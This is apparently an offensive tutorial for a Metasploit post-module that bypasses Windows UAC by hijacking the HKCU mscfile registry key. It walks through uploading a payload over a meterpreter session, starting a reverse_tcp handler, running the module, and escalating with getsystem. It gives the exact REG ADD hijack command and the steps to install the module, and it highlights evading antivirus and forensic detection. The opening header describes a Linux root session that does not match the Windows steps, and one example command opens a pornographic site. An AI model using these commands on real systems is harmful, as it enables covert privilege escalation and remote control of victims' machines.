Running on session  : 2
Target Architecture : x64
Computer            : 51.------------
Target IP addr      : 51.------------
Operative System    : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Payload directory   : /root
Client UID          : uid=0, gid=0, euid=0, egid=0

This next tutorial explains how EXEC_COMMAND can be used to achieve privilege escalation ..

We have achieved to exploit a windows target, but when trying to privilege escalation
using metasploit core modules (getprivs and getsystem) the execution fails and none
of the 3 methods available in getsystem module works...

1 - get a meterpreter session open to target system ..
     "its a post-exploitation module it requires a session allready open"

2 - upload your payload.exe to target system
      meterpreter > upload /root/payload.exe %temp%\\payload.exe

3 - background current session (ID 1)
     meterpreter > background

4 - start a new handler in background (of the payload uploaded)
     msf exploit(handler) > handler -P 666 -H 192.168.1.69 -p windows/meterpreter/reverse_tcp

5 - load enigma_fileless module
     msf exploit(handler) > use post/windows/escalate/enigma_fileless ...

set SESSION 1
set EXEC_COMMAND start %temp%\\payload.exe
exploit

set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start %temp%\\payload.exe
exploit

The 2 session will open as a high integrity process (elevated process hijack)
allowing us to priv escall using metasploit post-modules like getprivs and getsystem

1 - Interact with 2 session open
      msf exploit(handler) > sessions -i 2

2 - elevate privileges now
      meterpreter > getprivs
      meterpreter > getsystem

cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start %temp%\\payload.exe" /f

Most of the UAC bypass techniques require dropping a file to disk (for example, placing a
DLL on disk to perform a DLL hijack). The technique used in this module differs from the
other public methods and provides a useful new technique that does not rely on a privileged
file copy, code injection, or placing a traditional file on disk.

As a normal user, you have write access to keys in HKCU, if an elevated process interacts
with keys you are able to manipulate, you can potentially interfere with actions a high
integrity process is attempting to perform (hijack the process being started). Due to the
fact that I was able to hijack the process, it is possible to simply execute whatever
malicious cmd.exe or powershell.exe command you wish ..

This means that code execution has been achieved in a high integrity process
(bypassing UAC) without dropping a DLL or other file down to the file system. This
significantly reduces the risk to the attacker because they aren’t placing a traditional
file on the file system that can be caught by AV/HIPS or forensically identified later ..

1º - Download post-module from github using wget
wget https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/local%20privilege%20escalation/enigma_fileless_uac_bypass.rb


2º - Port post-module to metasploit database (KALI distros)
cp enigma_fileless_uac_bypass.rb /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb


3º - Start postgresql
service postgresql start


4º - Rebuild metasploit database
msfdb reinit


5º - Reload all modules into msf database
msfconsole -x 'db_status; reload_all'


6º - Load post-module
msf > use post/windows/escalate/enigma_fileless_uac_bypass


7º - read/access info/options
msf post(enigma_fileless_uac_bypass) > info
msf post(enigma_fileless_uac_bypass) > show advanced options

set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start chrome.exe www.youporn.com
exploit

cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Command start chrome.exe www.youporn.com" /f